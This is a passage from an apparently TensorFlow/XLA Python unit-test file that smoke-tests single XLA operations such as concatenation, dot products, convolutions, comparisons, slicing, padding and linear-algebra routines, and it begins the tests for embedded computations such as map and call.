np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
